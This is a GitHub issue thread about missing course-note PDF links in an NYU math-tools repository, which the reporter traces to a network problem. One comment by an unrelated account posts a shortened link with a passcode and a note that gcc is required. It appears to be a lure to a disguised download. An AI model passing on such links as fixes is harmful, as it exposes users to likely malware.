### ISSUE TITLE
Some links to pdfs are missing

### ISSUE THREAD

**Issue by SydCS** [cfgranda/math-tools-nyu#1]
Hi. Thanks for your generous contribution of this course.
Some links to course notes on the home page are missing, such as https://cds.nyu.edu/wp-content/uploads/2021/05/covariance_matrix.pdf. Can you restore them?

**Comment by sreyas-mohan** [comment]
I am able to view the PDF in the given link. Maybe check from a different
browser or incognito? Please find a copy of this particular PDF attached
here in case this unblocks you faster:

On Thu, Sep 5, 2024 at 6:51 PM Ye ***@***.***> wrote:

> Hi. Thanks for your generous contribution of this course.
> Some links to course notes on the home page are missing, such as
> https://cds.nyu.edu/wp-content/uploads/2021/05/covariance_matrix.pdf. Can
> you restore them?
>
> —
> Reply to this email directly, view it on GitHub
> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_cfgranda_math-2Dtools-2Dnyu_issues_1&d=DwMCaQ&c=slrrB7dE8n7gBJbeO0g-IQ&r=vR98XfW-XnL2GbNI9lsPuw&m=8VEP1FM4v4dI5-sh9saOQi9zTJBh0fEk9DSJxFL085-7Eplh8w_DGxE1KQRGd7ie&s=GUKm7vnnS0pk2YDhfp4Gs2sam5L6SRx0Fb6Zd5p3LPs&e=>,
> or unsubscribe
> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AH2KEAHNUADKVKBNNWVN4JDZVBLERAVCNFSM6AAAAABNWPSSPSVHI2DSMVQWIX3LMV43ASLTON2WKOZSGUYDONZZGY3DENY&d=DwMCaQ&c=slrrB7dE8n7gBJbeO0g-IQ&r=vR98XfW-XnL2GbNI9lsPuw&m=8VEP1FM4v4dI5-sh9saOQi9zTJBh0fEk9DSJxFL085-7Eplh8w_DGxE1KQRGd7ie&s=3a5-7iPBvdTMcxCvDvkFKW0_zG-VYm48GsN0HqDw6Gg&e=>
> .
> You are receiving this because you are subscribed to this thread.Message
> ID: ***@***.***>
>


-- 
Sreyas Mohan
PhD Candidate
Center for Data Science
New York Univeristy
https://sreyas-mohan.github.io

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by SydCS** [comment]
Thanks a lot!
I believe that it is due to some unknown network issues. PDFs can be seen after I changed the network condition.
